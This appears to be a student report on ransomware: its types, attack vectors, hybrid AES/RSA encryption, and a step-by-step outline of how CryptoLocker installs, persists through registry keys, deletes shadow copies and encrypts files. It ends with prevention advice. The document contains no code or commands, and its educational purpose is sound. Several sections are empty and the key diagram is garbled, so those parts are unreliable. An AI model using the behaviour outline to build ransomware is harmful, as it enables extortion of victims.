Ransomware: Developments and Impacts

1. Introduction

Ransomwares are one of the most prominent and existing threat to our data, file or other digital information that is stored in drives. Ransomware a sub set of malware that work by simply locking the desktop or inhibit user from accessing their data by encrypting their important file by using public key and demand ransom/extortion to decrypt the file by using private key. Ransomware cause a lot of financial damage, CryptoWall3 cause 320 million damage in 2015 only (CTA, 2015), while WannaCry loss estimated to be $4 billion (Cyence, 2017). More than 70% of the business loss access to their data forever whereas more than 25% unable to access the data for 5 days (Intermedia, 2017). Only in 2016 about 2,673 complain related to ransomware are received by FBI totaling a loss of $2.4 million.

1.2 What is Ransomware

Ransomware is a malicious program that encrypt user, company or any organization data or files and forced them to pay money in form bitcoin or other medium to decrypt the files, data. Ransomware uses different encryption method to encrypt the file. Once the file is encrypted an alarming message appear on the screen for ransom.

1.3 Types of Ransomware

Encrypting Ransomware

These Ransomware encrypt victim’s files on their devices and demand ransom by displaying a message window. If the ransom is paid, they send key to decrypt the file. Common examples of these types of ransomware are CrytoLocker, Crypto Wall, WannaCry.

Non-Encrypting Ransomware

Non-Encrypting ransomware restrict the users into logging by locking their machine and demand ransom from them to unlock the victim’s machine. Examples of these ransomware are WinLocker and Reveton

Leakware

This type is different from other ransomware because they don’t block access or encrypt users file or data. Rather they collect victim’s sensitive file or data and blackmail them to publish the data online, If the ransom is not paid.

1.4 Ransomware Attack Vectors

Malvertisement and Drive by Download

      Malicious advertisements are posted into legitimate websites.

      Once user click the advertisement link immediate infection take place on user PC.

Spam Email

Spam mail are old tool to deliver ransomware to victim machine. It contains malicious attachment or link that contain exploit kit. Spam mail contain various psychological levers to trick victim into downloading ransomware.

Vulnerability

Ransomware exploit vulnerability to infect devices, EternalBlue is one of the famous vulnerabilities found in windows machine that ransomware exploit to connect to remote servers via port 445 which allow to compromise entire network and all the devices connected with it. Due to this vulnerability ransomware infect more than 200,000 machines.

1.5 Ransomware Encryption (Hybrid Approach)

Symmetric Encryption

Pros                                                                        Cons

Asymmetric Encryption

Pros                                                                        Cons

Ransomware main approach is to encrypt large amount of data as fast as possible (1)

Secure the key from the outside world by keeping it private (2)

Statement (1) and (2) can be satisfy by applying Pros to the Cons of Symmetric and Asymmetric Encryption.

Symmetric Pros Replaces Asymmetric Cons (3)

Asymmetric Pros Replaces Symmetric Cons (4)

By combining (3) and (4) we can achieve hybrid encryption approach.

Illustration of Hybrid Approach

      System Infected

      Generate AES 256 bit key and encrypt files via AES for fast encrypion.

      Ransomware contain RSA 2048 public and private key for client (Cpriv, Cpub) and RSA 2048 public key of Server (Spub)                

                encrypt

Cpub  AES public key

                encrypt

Spub  Cpriv

                encrypt

Spriv  Spub

Advantage of Hybrid Approach

      Due to faster encryption, huge amount of data is encrypted.

      Once the device is affected there is no need to communicated to Command and Control Server for key exchange process.

      Enforce multiple mechanism to protect the key from victim and outside world.

2.CRYPTOLOCKER

 Cryptolocker is a ransomware that surfaced on internet in Sept 2013 within 4 month it infected approximately 200,000 to 250,000 devices (Dell Secureworks), and earned $27 million in first 100 days (ZDNet). Almost 41% of the British people pay the ransom (University of Kent). Due to fast success its copy cat variants and advance ransomware released every year.

      Usually spread via malicious mail attachment.

      Target Windows OS.

      Searches for file via extension doc, docx, jpeg, pdf etc.

      Encrypt files using RSA 2048-bit algorithm.

      Decryption of file when ransom is paid.

2.1 CryptoLocker Attack Vector

      Cryptolocker can spread via mail that contain malicious attachment (Microsoft Products malicious script are embedded in Macro).

      Spread through file sharing severs P2P (Malicious files are kept in system once user download the file they immediately get affected).

      Spread through downloads (Fake AV software, trick user their system is compromised and ask them to download their fake AV to remove virus).

2.2 How CryptoLocker Work

 Step 1

      Install Ransomware on PC.

      Generate unique code that identify the particular PC.

      Deactivate shadow copies, window recovery

      Copy itself to %AppData% or %LocalAppData%

      Create autorun registry in (CurrentVersionRunCryptoLocker:<random>.exe).

      Create additional registry key to even run in safe mode by applying asterisk in beginning (CurrentVersionRun*CryptoLocker:<random.exe>).

      Get IP address of particular PC.

Step 2

      Send message to command and control that a particular device has been affected.

      Send private key to command and control server.

      Delete private key from the infected system

Step 3

      Search files with the help of extension such as .pdf, .mdf, .jpeg, .docx, etc.

      Search files on network mapped drives.

Step 4

      Copy the files, folder names, by appending its extension (.encrypted or .cryptolocker).

      Apply encryption algorithm on the file change by CryptoLocker.

      Delete original files.

            Step 4 illustration with respect to I/O

Step 6

      Notify victim by alert message on desktop screen and demand ransom to decrypt files.        

2.3 CryptoLocker Real World Incidents

Case Study 1

Case Study 2

Case Study 3

Conclusion

Ransomware are advancing and generating more revenue as the year is passing. Organizations such as Health, Insurance, Government and Business sectors are the main target as compared to home users. Antivirus and firewall are not enough to combat ransomware. It is necessary to take other preventive measures not only by updating AV and OS but also keep regular offline backup, cautious when opening email attachment or clicking on link, use safe practices while browsing on internet.

References

• Challenges in cyber security – Ransomware Phenomenon
• https://eprint.iacr.org/2018/125.pdf
• Techniques and Solutions for Addressing Ransomware Attacks
• https://pdfs.semanticscholar.org/fa83/650f6d51aefe71148c541c67a68851212a13.pdf
• Hybrid Encryption. Ransomware encryption techniques
• Retrieved from
• https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9
• A study of ransomware
• http://web.stanford.edu/~csimoiu/doc/ransomware.pdf
• Reverse Engineering of WannaCry Worm and Anti Exploit Snort Rules
• https://digital-forensics.sans.org/community/papers/grem/reverse-engineering-wannacry-worm-anti-exploit-snort-rules_5549
• Data of Email attachment File Type, Url. Symantec Report 2019
• Retrieved from
• https://www.symantec.com/content/dam/symantec/docs/reports/istr-24-2019-en.pdf
• A SURVEY ON RANSOMEWARE: EVOLUTION, GROWTH, AND IMPACT
• https://pdfs.semanticscholar.org/d296/3936acb60983317fa6cee4d552c859e5b428.pdf
• Case Studies (1,2). CryptoLocker Ransomware
• Retrieved from https://www.hawaii.edu/alohaisac/conference/presentations/Aloha_ISAC_CryptoLocker.pdf
• CryptoLocker: Everything you need to know
• https://www.varonis.com/blog/cryptolocker/
• Case Study (3) Police pay ransom after cyber terror attack
• Retrieved from
• http://homenewshere.com/tewksbury_town_crier/news/article_8f8ce2ba-da0d-11e4-a127-578b97102bf0.html
• CryptoLocker Ransomware Infection
• https://www.us-cert.gov/ncas/alerts/TA13-309A
• CryptoLocker Ransomware
• https://www.secureworks.com/research/cryptolocker-ransomware